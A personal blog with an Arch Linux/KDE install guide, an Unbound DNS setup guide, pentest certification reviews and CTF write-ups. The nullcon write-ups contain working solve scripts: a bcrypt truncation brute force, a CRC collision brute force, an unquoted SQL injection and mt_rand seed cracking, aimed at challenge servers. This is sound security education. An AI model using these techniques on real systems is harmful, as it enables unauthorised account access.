Aftab Sama

How to Install Arch Linux with KDE

Thu, 08 Jan 2026 00:00:00 +0000

Preparation and Live Environment

Download

Download the ISO from archlinux.org and verify the Checksums using sha256sum.

sha256sum archlinux-2026.01.01-x86_64.iso | grep 16502a7c18eed827ecead95c297d26f9f4bd57c4b3e4a8f4e2b88cf60e412d6f

Flash

Flash it to a USB drive using a tool like dd or BalenaEtcher.

dd bs=4M if=archlinux-2026.01.01-x86_64.iso of=/dev/sda conv=fsync oflag=direct status=progress

Note: Replace /dev/sda with the correct device name for your USB drive.

Boot

Plug the USB into your PC, enter your BIOS/Boot menu, and select the USB drive.

Connect to Internet

Ethernet should work automatically. For Wi-Fi, Run iwctl, then device list, scan networks using station wlan0 scan, then station wlan0 get-networks, connect to a network using station wlan0 connect "".

Update System Clock: timedatectl set-ntp true

Partitioning the Disk

This is the most important step. We will create two partitions:

EFI (1GB)
Root (the rest).

You might be familiar with allocating a third partition for swap space (4GB-8GB), but that’s not necessary. Using a swap file within an existing partition achieves the same performance and can be more flexible.

While a 512MB EFI partition is sufficient if disk space is limited, allocating 1GB is recommended to provide better long-term flexibility.

Identify your drive

Run fdisk -l. (Usually /dev/sda or /dev/nvme0n1)

Partitioning

Use fdisk to partition the disk.

fdisk /dev/nvme0n1

Note: Replace /dev/nvme0n1 with the correct device name for your disk.

In fdisk:

type g to create new GPT partition table.
type n to create a new partition.
type 1 to select the first partition.
press Enter to accept the default start sector.
type +1G to set the size of the partition to 1GB.
type t to change the partition type.
type ef to set the partition type to EFI System.
type n to create a new partition.
type 2 to select the second partition.
press Enter to accept the default start sector.
press Enter to accept the default end sector.
type w to write the changes to disk.

Formatting

EFI partition:

mkfs.fat -F32 /dev/nvme0n1p1

Root partition:

Btrfs file system

mkfs.btrfs -L arch_root /dev/nvme0n1p2

or, Ext4 file system

mkfs.ext4 /dev/nvme0n1p2

Installation

Setup mirrors

Sync the pacman repository and install reflector to update the mirror list based on download speed.

pacman -Syy
pacman -S reflector
cp /etc/pacman.d/mirrorlist /etc/pacman.d/mirrorlist.bak
reflector --latest 100 --protocol https --sort rate --save /etc/pacman.d/mirrorlist --number 20

Base Installation

Mount Root:

mount /dev/nvme0n1p2 /mnt

Mount EFI:

mount --mkdir /dev/nvme0n1p1 /mnt/boot

Install Base Packages:

pacstrap /mnt base linux linux-firmware nano vim

Generate Fstab:

genfstab -U /mnt >> /mnt/etc/fstab

System Configuration

Enter your new system:

arch-chroot /mnt

Timezone:

ln -sf /usr/share/zoneinfo/Asia/Kolkata /etc/localtime
hwclock --systohc

Localization:

Uncomment the desired locale in /etc/locale.gen

en_US.UTF-8 UTF-8

Generate the locale using locale-gen. Set the locale in /etc/locale.conf

locale-gen
echo "LANG=en_US.UTF-8" > /etc/locale.conf

Network:

Set hostname:

echo "your-cool-hostname" > /etc/hostname

Install and enable NetworkManager:

pacman -S networkmanager
systemctl enable NetworkManager

Users:

Set root password:

passwd

Create a user:

pacman -S sudo
useradd -m username
usermod -aG wheel,audio,video,storage username
passwd username

Edit /etc/sudoers (uncomment the line %wheel ALL=(ALL) ALL):

EDITOR=vim visudo

Bootloader and Desktop Environment

Bootloader (GRUB):

For UEFI systems:

pacman -S grub efibootmgr
grub-install --target=x86_64-efi --efi-directory=/boot --bootloader-id=GRUB
grub-mkconfig -o /boot/grub/grub.cfg

For Non-UEFI systems:

pacman -S grub
grub-install /dev/nvme0n1
grub-mkconfig -o /boot/grub/grub.cfg

Drivers:

Intel:

pacman -S xf86-video-intel intel-ucode mesa vulkan-intel intel-media-driver libva-utils

AMD:

pacman -S xf86-video-amdgpu amd-ucode mesa vulkan-radeon libva-mesa-driver

KDE Plasma Installation:

pacman -S xorg plasma-meta plasma-wayland-session sddm konsole dolphin
systemctl enable sddm

Finishing Up

exit
umount -R /mnt
reboot

Optional Packages

Install additional packages - some apps and tools that i use:

sudo pacman -S --needed 7zip a52dec ark base base-devel bash-completion bluez-utils btrfs-progs chromium dolphin dosfstools exfatprogs faac faad2 firefox fwupd git go gst-libav gst-plugin-pipewire gst-plugins-bad gst-plugins-good gst-plugins-ugly guvcview hashcat hashcat-utils iw jdk-openjdk john konsole less libdca libdv libmad libmpeg2 libreoffice-fresh libva-utils linux linux-firmware mesa mpv nano neochat networkmanager ntfs-3g obs-studio obsidian okular openssh partitionmanager pipewire-alsa plasma-meta python-pip qbittorrent qemu-full reflector sddm sof-firmware speech-dispatcher sudo symlinks thunderbird torbrowser-launcher unbound usbutils vim virt-manager virt-viewer wavpack weechat xfsprogs yt-dlp zed

Happy Hacking

Install and Set Up Unbound DNS Server in Arch Linux

Wed, 07 Jan 2026 00:00:00 +0000

Install Unbound

You can use any package manager of your choice. For me it’s pacman.

sudo pacman -Syu unbound

Backup the default configuration file, which is located at /etc/unbound/unbound.conf.

sudo cp /etc/unbound/unbound.conf /etc/unbound/unbound.conf.bak

Edit /etc/unbound/unbound.conf file.

include: "/etc/unbound/conf.d/*.conf"
server:
        num-threads: 4
        interface: ::1
        interface: 127.0.0.1
        port: 53
        so-rcvbuf: 4m
        msg-cache-size: 50m
        msg-cache-slabs: 4
        rrset-cache-size: 100m
        rrset-cache-slabs: 4
        infra-cache-slabs: 4
        do-ip4: yes
        do-udp: yes
        do-tcp: yes
        access-control: 127.0.0.0/8 allow
        access-control: ::1 allow
        access-control: ::ffff:127.0.0.1 allow
        chroot: "/etc/unbound"
        username: "unbound"
        directory: "/etc/unbound"
        use-syslog: yes
        log-time-ascii: yes
        log-queries: yes
        log-servfail: yes
        root-hints: "root.hints"
        hide-identity: yes
        hide-version: yes
        hide-http-user-agent: yes
        harden-glue: yes
        qname-minimisation: yes
        prefetch: yes
        prefetch-key: yes
        minimal-responses: yes
        auto-trust-anchor-file: "root.key"
        key-cache-slabs: 4
        tls-cert-bundle: "/etc/ssl/certs/ca-certificates.crt"

Fetch Root Hints and DNSSEC Key

Unbound needs to know where the “root” servers of the internet are.

Download Root Hints:

sudo curl -o /etc/unbound/root.hints https://www.internic.net/domain/named.cache

Initialize DNSSEC:

sudo unbound-anchor -a /etc/unbound/root.key

Fix permissions:

sudo chown unbound:unbound /etc/unbound/root.key
sudo chown unbound:unbound /etc/unbound/
sudo mkdir -p /etc/unbound/conf.d/

Directing System Traffic to Unbound

We need to tell our network configuration tool to use 127.0.0.1 (local Unbound server) for DNS lookups. NetworkManager is the standard and most used in Linux.

Edit /etc/NetworkManager/NetworkManager.conf:

[main]
dns=none

Edit /etc/resolv.conf:

nameserver 127.0.0.1
nameserver ::1
options edns0 trust-ad

Optional:

To prevent overwriting this file, run:

sudo chattr +i /etc/resolv.conf

Start and Enable the Unbound Service

Now, fire up the Unbound engine:

sudo systemctl enable --now unbound

Verify the status of the Unbound service:

systemctl status unbound

If it says active (running), you are good to go!

Verify the Setup

Run a DNS lookup and check the “SERVER” field in the output. It should point to 127.0.0.1.

drill google.com

Expected output:

;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 29355
;; flags: qr rd ra ; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 
;; QUESTION SECTION:
;; google.com.  IN      A

;; ANSWER SECTION:
google.com.     300     IN      A       142.250.70.78

;; AUTHORITY SECTION:

;; ADDITIONAL SECTION:

;; Query time: 102 msec
;; SERVER: 127.0.0.1
;; WHEN: Wed Jan  7 17:26:01 2026
;; MSG SIZE  rcvd: 44

Using “Forward Zones”

You can use forwarding if you prefer to let a faster provider handle the recursion while you still enjoy Unbound’s local caching and DNSSEC validation.

For me i need to use forwarder for some wifi AP because the ISP keeps hijacking DNS requests, so the DNSSEC would fail. To solve this i use DNS forwarding over tls so ISP can’t hijack the DNS requests.

To do this just add new .conf file in /etc/unbound/conf.d/ directory. I’m using cloudflare dns over tls, so the setup would look like this:

File: /etc/unbound/conf.d/cloudflare.conf

# Forward all DNS queries to Cloudflare over TLS
forward-zone:
    name: "."
    forward-tls-upstream: yes
    forward-addr: 1.1.1.1@853#cloudflare-dns.com
    forward-addr: 1.0.0.1@853#cloudflare-dns.com
    forward-addr: 2606:4700:4700::1111@853#cloudflare-dns.com
    forward-addr: 2606:4700:4700::1001@853#cloudflare-dns.com

And, restart the Unbound service:

sudo systemctl restart unbound

To stop the forwarding, simply rename the extension of the file to something else:

sudo mv /etc/unbound/conf.d/cloudflare.conf /etc/unbound/conf.d/cloudflare.conf.bak

DNS blocklist

If you want to use dns blocklist like oisd, download the unbound conf file for that and place it in /etc/unbound/conf.d/ directory.

sudo curl -o /etc/unbound/conf.d/block-oisd_big.conf https://big.oisd.nl/unbound

Troubleshooting

Check Unbound Logs

If you encounter any issues, check the logs:

journalctl -u unbound

Happy Hacking

Certified Network Pentester (CNPen) exam Review

Tue, 25 Feb 2025 00:00:00 +0000

About Exam

The exam formate is pretty much same as of Certified AppSec Pentester (CAPen) exam. you can read about that here.

My Thoughts on the Exam and Some Tips

The exam consists of 15 multiple-choice, and CTF-type questions. Each question is allocated an appropriate score based on its level of difficulty.

I think the exam difficulty was like an easy-rated HTB machine. The following HTB machines are very close to the exam lab environment that I could find.

Make sure to read the above HTB write-ups. You will be using very similar techniques.

The NetExec tool was very useful; make sure to get comfortable using it. During the exam, to use tools like Mimikatz, you will need to transfer them to target machine. Learn some techniques on how to transfer files/tools between your machine and the target machine.

I have observed that the exam lacks dynamic questions. The questions and flags remain the same in every attempt. In my opinion, this is a significant drawback. If the exam questions are leaked, it would undermine the exam’s credibility and reduce its value.

Happy Hacking

nullcon HackIM CTF Goa 2025

Sun, 02 Feb 2025 00:00:00 +0000

CTF Event URL: https://ctf.nullcon.net/challenges
Event Start Time: February 1st, 2025, at 08:30 UTC
Event End Time: February 2nd, 2025, at 08:30 UTC

Challenges

Bfail

Description: To ‘B’ secure or to ‘b’ fail? Strong passwords for admins are always great, right?
URL: http://52.59.124.14:5013/

Here we have a simple login page which gives the Method Not Allowed error when trying to login.
In the HTML page source code we have one interesting comment.

Visiting this path gives us the python source code of the challenge.

the password is generated using os.urandom(128). It will generate 128 random bytes. impossible to brute force. and we are also given first 71 bytes of password and password’s bcrypt hash.

b'\xec\x9f\xe0a\x978\xfc\xb6:T\xe2\xa0\xc9<\x9e\x1a\xa5\xfao\xb2\x15\x86\xe5$\x86Z\x1a\xd4\xca#\x15\xd2x\xa0\x0e0\xca\xbc\x89T\xc5V6\xf1\xa4\xa8S\x8a%I\xd8gI\x15\xe9\xe7$M\x15\xdc@\xa9\xa1@\x9c\xeee\xe0\xe0\xf76'
app.ADMIN_PW_HASH = b'$2b$12$8bMrI6D9TMYXeMv8pq8RjemsZg.HekhkQUqLymBic/cRhiKRa3YPK'

To successfully login our password’s bcrypt hash needs to match above bcrypt hash.

What is bcrypt algorithm anyways!

with little bit of research we came to know that bcrypt will only take the maximum of first 72 bytes from password when generating the hash.

Refence: What is Bcrypt and how it works? | NordVPN

since we are already given the first 71 bytes of password, we only need to brute force one byte (256 total values).

Python code:

import bcrypt

admin_password = b"\xec\x9f\xe0a\x978\xfc\xb6:T\xe2\xa0\xc9<\x9e\x1a\xa5\xfao\xb2\x15\x86\xe5$\x86Z\x1a\xd4\xca#\x15\xd2x\xa0\x0e0\xca\xbc\x89T\xc5V6\xf1\xa4\xa8S\x8a%I\xd8gI\x15\xe9\xe7$M\x15\xdc@\xa9\xa1@\x9c\xeee\xe0\xe0\xf76"
ADMIN_PW_HASH = b"$2b$12$8bMrI6D9TMYXeMv8pq8RjemsZg.HekhkQUqLymBic/cRhiKRa3YPK"
fixed_salt = ADMIN_PW_HASH[:29]  # Cost factor["$2b$12$" - length(7)] + Salt [16 bytes which is then hashed, resulting in a 22-character string] = b'$2b$12$8bMrI6D9TMYXeMv8pq8Rje'

for value in range(256):
    byte_value = bytes([value])
    password = admin_password + byte_value
    hashed_password = bcrypt.hashpw(password, fixed_salt)
    if hashed_password == ADMIN_PW_HASH:
        print("password found:")
        print(password)
        break

Output:

┌──PS(Aftab@Sama)-[~\Downloads\Nullcon HackIM CTF Goa 2025]
└─$ python Bfail.py
password found:
b'\xec\x9f\xe0a\x978\xfc\xb6:T\xe2\xa0\xc9<\x9e\x1a\xa5\xfao\xb2\x15\x86\xe5$\x86Z\x1a\xd4\xca#\x15\xd2x\xa0\x0e0\xca\xbc\x89T\xc5V6\xf1\xa4\xa8S\x8a%I\xd8gI\x15\xe9\xe7$M\x15\xdc@\xa9\xa1@\x9c\xeee\xe0\xe0\xf76\xaa'

we got the password but the login request is still giving errors.

looking at the code we can see that it is checking for password and username parameters in request body but it is only accepting the GET requests.

we can pass the username and password in body of GET request (fat GET request).

Python Code:

import urllib
import requests

admin_password = b"\xec\x9f\xe0a\x978\xfc\xb6:T\xe2\xa0\xc9<\x9e\x1a\xa5\xfao\xb2\x15\x86\xe5$\x86Z\x1a\xd4\xca#\x15\xd2x\xa0\x0e0\xca\xbc\x89T\xc5V6\xf1\xa4\xa8S\x8a%I\xd8gI\x15\xe9\xe7$M\x15\xdc@\xa9\xa1@\x9c\xeee\xe0\xe0\xf76\xaa"
encoded_data = urllib.parse.quote_from_bytes(admin_password)
payload = f"username=admin&password={encoded_data}"
print(
    requests.get(
        f"http://52.59.124.14:5013/",
        data=payload,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    ).content
)

Output:

┌──PS(Aftab@Sama)-[~\Downloads\Nullcon HackIM CTF Goa 2025]
└─$ python Bfail.py
b"Congrats! It appears you have successfully bf'ed the password. Here is your ENO{BCRYPT_FAILS_TO_B_COOL_IF_THE_PW_IS_TOO_LONG}"

Flag: ENO{BCRYPT_FAILS_TO_B_COOL_IF_THE_PW_IS_TOO_LONG}

Crahp

Description: Oh Crahp, I forgot my credentials! Can you login nontheless?
URL: http://52.59.124.14:5006/

In the source code we can see that we need to satisfy 3 conditions to get the flag:

password length should be 15 characters.
password should not be equal to “AdM1nP@assW0rd!”.
crc16 and crc8 of our password should match the crc16 and crc8 of AdM1nP@assW0rd!.

crc8 and crc16 are very small length, so multiple inputs have high chances of having the same crc hash and can be brute forced easily.

PHP code:

php
if(isset($_GET['source'])) {
    highlight_file(__FILE__);
}


// https://www.php.net/manual/en/function.crc32.php#28012
function crc16($string) {
  $crc = 0xFFFF;
  for ($x = 0; $x < strlen ($string); $x++) {
    $crc = $crc ^ ord($string[$x]);
    for ($y = 0; $y < 8; $y++) {
      if (($crc & 0x0001) == 0x0001) {
        $crc = (($crc >> 1) ^ 0xA001);
      } else { $crc = $crc >> 1; }
    }
  }
  return $crc;
}


// https://stackoverflow.com/questions/507041/crc8-check-in-php/73305496#73305496
function crc8($input)
{
$crc8Table = [
    0x00, 0x07, 0x0E, 0x09, 0x1C, 0x1B, 0x12, 0x15,
    0x38, 0x3F, 0x36, 0x31, 0x24, 0x23, 0x2A, 0x2D,
    0x70, 0x77, 0x7E, 0x79, 0x6C, 0x6B, 0x62, 0x65,
    0x48, 0x4F, 0x46, 0x41, 0x54, 0x53, 0x5A, 0x5D,
    0xE0, 0xE7, 0xEE, 0xE9, 0xFC, 0xFB, 0xF2, 0xF5,
    0xD8, 0xDF, 0xD6, 0xD1, 0xC4, 0xC3, 0xCA, 0xCD,
    0x90, 0x97, 0x9E, 0x99, 0x8C, 0x8B, 0x82, 0x85,
    0xA8, 0xAF, 0xA6, 0xA1, 0xB4, 0xB3, 0xBA, 0xBD,
    0xC7, 0xC0, 0xC9, 0xCE, 0xDB, 0xDC, 0xD5, 0xD2,
    0xFF, 0xF8, 0xF1, 0xF6, 0xE3, 0xE4, 0xED, 0xEA,
    0xB7, 0xB0, 0xB9, 0xBE, 0xAB, 0xAC, 0xA5, 0xA2,
    0x8F, 0x88, 0x81, 0x86, 0x93, 0x94, 0x9D, 0x9A,
    0x27, 0x20, 0x29, 0x2E, 0x3B, 0x3C, 0x35, 0x32,
    0x1F, 0x18, 0x11, 0x16, 0x03, 0x04, 0x0D, 0x0A,
    0x57, 0x50, 0x59, 0x5E, 0x4B, 0x4C, 0x45, 0x42,
    0x6F, 0x68, 0x61, 0x66, 0x73, 0x74, 0x7D, 0x7A,
    0x89, 0x8E, 0x87, 0x80, 0x95, 0x92, 0x9B, 0x9C,
    0xB1, 0xB6, 0xBF, 0xB8, 0xAD, 0xAA, 0xA3, 0xA4,
    0xF9, 0xFE, 0xF7, 0xF0, 0xE5, 0xE2, 0xEB, 0xEC,
    0xC1, 0xC6, 0xCF, 0xC8, 0xDD, 0xDA, 0xD3, 0xD4,
    0x69, 0x6E, 0x67, 0x60, 0x75, 0x72, 0x7B, 0x7C,
    0x51, 0x56, 0x5F, 0x58, 0x4D, 0x4A, 0x43, 0x44,
    0x19, 0x1E, 0x17, 0x10, 0x05, 0x02, 0x0B, 0x0C,
    0x21, 0x26, 0x2F, 0x28, 0x3D, 0x3A, 0x33, 0x34,
    0x4E, 0x49, 0x40, 0x47, 0x52, 0x55, 0x5C, 0x5B,
    0x76, 0x71, 0x78, 0x7F, 0x6A, 0x6D, 0x64, 0x63,
    0x3E, 0x39, 0x30, 0x37, 0x22, 0x25, 0x2C, 0x2B,
    0x06, 0x01, 0x08, 0x0F, 0x1A, 0x1D, 0x14, 0x13,
    0xAE, 0xA9, 0xA0, 0xA7, 0xB2, 0xB5, 0xBC, 0xBB,
    0x96, 0x91, 0x98, 0x9F, 0x8A, 0x8D, 0x84, 0x83,
    0xDE, 0xD9, 0xD0, 0xD7, 0xC2, 0xC5, 0xCC, 0xCB,
    0xE6, 0xE1, 0xE8, 0xEF, 0xFA, 0xFD, 0xF4, 0xF3
];

    $byteArray = unpack('C*', $input);
    $len = count($byteArray);
    $crc = 0;
    for ($i = 1; $i <= $len; $i++) {
        $crc = $crc8Table[($crc ^ $byteArray[$i]) & 0xff];
    }
    return $crc & 0xff;
}

$MYPASSWORD = "AdM1nP@assW0rd!";

$pwhash1 = crc16($MYPASSWORD);
$pwhash2 = crc8($MYPASSWORD);
echo "crc16 = $pwhash1 \n";
echo "crc8 = $pwhash2 \n";
$number = 100000000000000;
while (true) {
    $combination = strval($number);
    if (crc16($combination) === $pwhash1 && crc8($combination) === $pwhash2) {
        echo "Match found: $combination\n";
        $found = true;
        break;
        exit;
    }
    $number++;
}

?>

Output:

┌──PS(Aftab@Sama)-[~\Downloads\Nullcon HackIM CTF Goa 2025]
└─$ php craph.php
crc16 = 25010
crc8 = 167
Match found: 100000010130312

Flag: ENO{Cr4hP_CRC_Collison_1N_P@ssw0rds!}

Numberizer

Description: Are you good with numbers?
URL: http://52.59.124.14:5004/

To get the flag we need to satisfy the following conditions:

Input should be a number.
we send 5 numbers.
The number should not be negative.
length of each input should not be greater than 4.
to get the flag total sum of all numbers should be less than 0.

are you thinking of integer overflow ?

For integer overflow to occur, the number has to be large enough so that it will wrap around to its minimum negative value. but we limited to input with max length of 4.

ever heard of E notation or exponential notation !

It’s those numbers like 3e2 which is equivalent of 3×10².

Reference: Scientific notation - Wikipedia

now we can have very large number within 4 characters limit.
9e99 will become 9x10⁹⁹.

submit this as input and it will overflow the integer.

Flag: ENO{INTVAL_IS_NOT_ALW4S_P0S1TiV3!}

Paginator

Description: There can’t much go wrong with pagination, right?
URL: http://52.59.124.14:5012/

The flag is stored at first index. $min and $max values are taken from GET parameter p. and the value of $min should not be <=1.

After that the $min and $max are used in SQL query directly.

are you thinking of SQL injection?

correct, and we don’t even need to escape any quotes because there are no quotes.

payload like OR 1=1 should work. let’s try it!

$ echo "RU5Pe1NRTDFfVzF0aF8wdVRfQzBtbTRfVzBya3NfU29tZUhvdyF9" | base64 -d
ENO{SQL1_W1th_0uT_C0mm4_W0rks_SomeHow!}

Flag: ENO{SQL1_W1th_0uT_C0mm4_W0rks_SomeHow!}

Sess.io

Description: Long sessions must be secure, right?
URL: http://52.59.124.14:5008/

Source code:

php
define("ALPHA", str_split("abcdefghijklmnopqrstuvwxyz0123456789_-"));
ini_set("error_reporting", 0);

if(isset($_GET['source'])) {
    highlight_file(__FILE__);
}

include "flag.php"; // $FLAG
$SEEDS = str_split($FLAG, 4);

function session_id_secure($id) {
    global $SEEDS;
    mt_srand(intval(bin2hex($SEEDS[md5($id)[0] % (count($SEEDS))]),16));
    $id = "";
    for($i=0;$i<1000;$i++) {
        $id .= ALPHA[mt_rand(0,count(ALPHA)-1)];
    }
    return $id;
}

if(isset($_POST['username']) && isset($_POST['password'])) {
    session_id(session_id_secure($_POST['username'] . $_POST['password']));
    session_start();
    echo "Thank you for signing up!";
}else {
    echo "Please provide the necessary data!";
}
?>

Here username + password is passed to the session_id($id) function.

session_id(session_id_secure($_POST['username'] . $_POST['password']));

$SEEDS is array of flag with each element of length 4.

$SEEDS = str_split($FLAG, 4);

first character from md5($id) is used as index in the $SEEDS array. the $id is concatenation of the username and password we submit.

mt_srand(intval(bin2hex($SEEDS[md5($id)[0] % (count($SEEDS))]),16));

The specific item at index of md5($id)[0] in $SEEDS array which is also part of the flag is then converted from string to hex using bin2hex and then from hex to integer using intval.

This integer is used as seed for PHP’s mt_rand random number generator. and using that seed it will generate 1000 numbers to create a session id.

for($i=0;$i<1000;$i++) {
        $id .= ALPHA[mt_rand(0,count(ALPHA)-1)];
    }

The generated number is used as index to get the specific character from ALPHA string array.

define("ALPHA", str_split("abcdefghijklmnopqrstuvwxyz0123456789_-"));

To get the flag from this session id we need to get the value of seed.

With simple search we can find openwall/php_mt_seed: PHP mt_rand() seed cracker tool to brute force and crack the seed used.

In this repo we have the following pw2args.php file to convert the password string to arguments that this tool can use. In this we need to update the $allowable_characters string with $ALPHA string from challenge code.

php
$allowable_characters = 'abcdefghijklmnopqrstuvwxyz0123456789_-';
$len = strlen($allowable_characters) - 1;
$pass = $argv[1];
for ($i = 0; $i < strlen($pass); $i++) {
    $number = strpos($allowable_characters, $pass[$i]);
    echo "$number $number 0 $len  ";
}
echo "\n";
?>

Now we just need to get the flag in correct order using specific inputs that have their first characters from 0-9. with simple python script we can get following values which have first character of md5 as 0-9.

submit these values as password to get the blocks of flag and use first 10-15 characters to crack the seed.

Once we get the seed we will convert it from integer > hex > string.

int_value = 1162760059
hex_value = hex(int_value)[2:]
if len(hex_value) % 2 != 0:
    hex_value = "0" + hex_value
binary_data = bytes.fromhex(hex_value)
original_value = binary_data.decode()
print("Original Value:", original_value)

Output:

┌──PS(Aftab@Sama)-[~\Downloads\Nullcon HackIM CTF Goa 2025]
└─$ python sess_io.py
Original Value: ENO{

This output looks promising, first 4 character of flag.

repeat this process for rest of the blocks and eventually we get the flag.

Flag: ENO{SOME_SUPER_SECURE_FLAG_1333337_HACK}

Happy Hacking

Certified AppSec Pentester (CAPen) Review + Tips/Tricks

Wed, 29 Jan 2025 00:00:00 +0000

About Exam

What is CAPen

Certified AppSec Pentester (CAPen) is an intermediate-level exam to test a candidate’s knowledge on the core concepts involving application security. Candidates must be able to demonstrate practical knowledge to conduct an application pentest to pass this exam. Note: The CAPen exam is also listed in the preferred pathway for SynAck’s SRT criteria.

Cost

It costs £250.00 but they run discount deals on festivals like Diwali or Black Friday.

What is the format of the exam?

CAPen is 4 hour long practical exam (you get 15 minutes extra for VPN configuration). The exam can be taken online, anytime (on-demand) and from anywhere. Candidates will need to connect to the exam VPN server to access the vulnerable applications. The VPN details are provided via mail within 24 hours of purchasing the exam. Tip: If you face VPN issues while giving the exam just reconnect the VPN.

What is the pass criteria for the exam?

The pass criteria are as follows:

From 00.00% to 59.99% - Failed
From 60.00 to 74.99% - Passed
From 75.00 to 100.00% - Passed with Merit ( you get passed with merit written on you certificate)

What is the exam retake policy?

Candidates, who fail the exam, are allowed 1 free exam retake.

Proctoring

Exam is not proctored. You are allowed to access the internet during the exam and search related to any topic. However, you are not allowed to ask anyone to help during the exam.

How long is the certificate valid for?

The certificate does not have an expiration date. However, the passing certificate will mention the details of the exam such as the exam version and the date. As the exam is updated over time.

Do they provide Course/Training for Exam?

No, Being an independent certifying authority, The SecOps Group do not provide any training for the exam. You can go over each topic listed in the syllabus.

Mock exams

They provide the Mock Exams for free to get the idea about the exam. Must give Mock exam before the real one.

Tips & Tricks

Ensure all necessary tools are preconfigured:
- sslyze - for SSL/TLS scanning.
- Burp Suite or any other proxy tool of your choice.
- Python or any scripting language you prefer.
- sqlmap - an automatic SQL injection and database takeover tool.
- AWS CLI - for accessing S3 buckets.
- OpenVPN - for connecting to the exam VPN.
For OSINT-related challenges, search for the same username as the target or variations of it on platforms like GitHub, GitLab, Bitbucket, and Pastebin.
Avoid trying to obtain a reverse shell. You will be provided with the file path where the flag is located, so read the flag directly. This will save you time.
When you start the exam, the VPN may take some time to take effect. First, go through all the questions and take mental notes. Sometimes, one question can help solve another.
Keep your notes handy or utilize online resources like Payloads All The Things and HackTricks.
Some vulnerabilities may require multi-step exploitation. Learn how to automate this process.

My Thoughts on the Exam

The exam consists of 17 true/false, yes/no, multiple-choice, and CTF-type questions. Each question is allocated an appropriate score based on its level of difficulty.

In my opinion, the overall difficulty level was easy, not intermediate. However, each person’s experience may vary.

The questions are very specific regarding the type of vulnerability class you will be exploiting, which makes the exam easier.

Reference

Happy Hacking

Burp Suite Certified Practitioner (BSCP) Review + Tips/Tricks

Sat, 30 Nov 2024 00:00:00 +0000

About Exam

What is BSCP

The Burp Suite Certified Practitioner exam is a challenging practical examination designed to demonstrate your web security testing knowledge and Burp Suite skills. To pass the certification exam, you are required to demonstrate an in-depth knowledge of a wide range of vulnerability classes, and the Burp Suite functionality required to support you in discovery, understanding, and exploitation.

Cost

The certification cost $99, and it expires after five years. Once you purchase your Burp Suite Certified Practitioner exam, you have 12 months to use it before it expires.

Proctoring

The exam uses a third-party automated proctoring service called Examity. It is used to verify your identity at the beginning of the exam and takes about 5 minutes to complete. After that, you can close that Examity window. You don’t need to keep your camera and microphone on throughout the exam.

How to prepare

Before you take your real exam, make sure to complete this four-step preparation guide by PortSwigger.

Exam structure

You will have four hours to complete the Burp Suite Certified Practitioner exam. There are two applications, and each application contains deliberate vulnerabilities. This means that each application can be completed in three stages:

Stage 1: Access any user account.
Stage 2: Use your user account to access the admin interface, perhaps by elevating your privileges or compromising the administrator account.
Stage 3: Use the admin interface to read the contents of /home/carlos/secret from the server’s filesystem, and submit it using “submit solution”.

Important things to remember

Part of being a professional is handling responsibility. While exploiting each application, you will gain access to powerful functionality. If you use this to delete your own account or a core system component, you may make your exam impossible to complete.

Once you have started the exam timer, there is no option to pause or reset your exam. If you wish to retake the exam, you will need to purchase another exam and begin the process again.

You must use a Burp project file for the full period of the exam and submit that project file for analysis.

Tips & Tricks

Some Tips

There are two applications, each with three stages: user->Admin->Read File on Server.
- These three stages are expected to be completed in order. Attempting to break into the admin interface if you haven’t yet got access to a user account or attempting to read files if you don’t have access to an admin account is a waste of time.
Outbound traffic from the vulnerable servers to the internet will be restricted. You won’t be able to connect back to any internet server, except for the public Burp Collaborator server and the integrated exploit server.
Scanning selected pages and insertion points with Burp Suite Professional will often help you quickly progress through the exam.
Improve your general discovery skills by working through some mystery labs and leaving the topic random to challenge yourself further.
If you find an SSRF vulnerability, you can use it to read files by accessing an internal-only service running on localhost on port 6566.
There will be one active user who will visit the homepage of the site every 15 seconds and click any links in any emails they receive from the application.
There is always an administrator account with the username “administrator”, plus a lower-privileged account usually called “carlos”. If you find a username enumeration vulnerability, you may be able to break into a low-privileged account using the following username list and password list.

More Tips

Finding a vulnerability isn’t enough. You also need to exploit it. This could involve chaining it to other vulnerabilities and demonstrating the actual security impact.

You may get caught out by a filter. So keep your payloads/poc ready for different scenarios you may face. For this, you can make your own notes to quickly search and find the relevant payload, or you can use the other existing cheatsheets that others have already made.

Reference:

Setup and configure all the tools that you may need in the exam, like ysoserial, PHPGGC, sqlmap, Burp Extensions, etc., and get yourself familiar with using them. because the exam timing is short, you can’t waste any time configuring the tools.

While taking the practice exam, I didn’t have ysoserial installed, and when I installed it, my current Java version was not supported by the tool, so I had to install the different Java version during the exam. Don’t do this type of mistakes.

Take the snapshot of the VM after setting up all the tools.

The exam stages are linear. If you don’t get the first stage (normal user account), You never know which vulnerabilities will be there in the following stage. The above reference links also contain information on what types of vulnerabilities you may get at different stages. New functionalities you get with each stage are the right place to look for vulnerabilities.

You may fall into a rabbit hole, so allocate your time carefully. If you found something but are not getting anything even after putting in a lot of time, take a note of it and look at some other place. Maybe you need to chain it with something else.

Get comfortable with mystery labs and review all the lab solutions before attempting the exam.

My Thoughts on the Exam

I wouldn’t say it was easy. Completing the exam in the given time with a total black box approach makes it difficult. It is similar to a practice exam, but slightly more difficult. However, each person’s experience is different.

The Burp Suite Certified Practitioner exam consists of dynamic questions, ensuring each attempt presents different vulnerabilities and unique lab scenarios. This approach keeps the challenge fresh and engaging every time, adding to the exam’s value and credibility—even in the event of question leaks.

The burp scanner was a great help and exam timing feels short to complete all 6 stages.

If you prefer video mode, then this excellent YouTube video is perfect for someone who is looking for BSCP exam review + tips/tricks.

https://portswigger.net/web-security/e/c/d1810975205c9a28

Happy Hacking

Cyberyami Web Warriors

Sun, 22 Sep 2024 00:00:00 +0000

CTF Event URL: https://www.cyberyami.com/compete/cyberyami-web-warriors-dsgisbwd
Event Start Time: September 21, 2024, at 11:00 AM (IST)
Event End Time: September 21, 2024, at 09:00 PM (IST)

Challenges

Vanish

URL: http://3.7.252.130/Vanish/
Point: +30
Description: Forget stains!

Flag is in white color (same as background), so we can’t see it directly. To see the flag, open the page’s HTML source code (Ctrl+U).

Flag: CyberYami{4ll_3ye5_0n_M3}

Antique_cafe

URL: http://3.7.252.130/Antique_cafe/
Point: +30
Description: Visit our cafe.

Flag is divided into four parts. The first part can be found in the page’s HTML source code.

http://3.7.252.130/Antique_cafe/ => CyberYami{Y

The second part is in the robots.txt file.

http://3.7.252.130/Antique_cafe/robots.txt => 0u__g0

The third part is in the tailwind.css file.

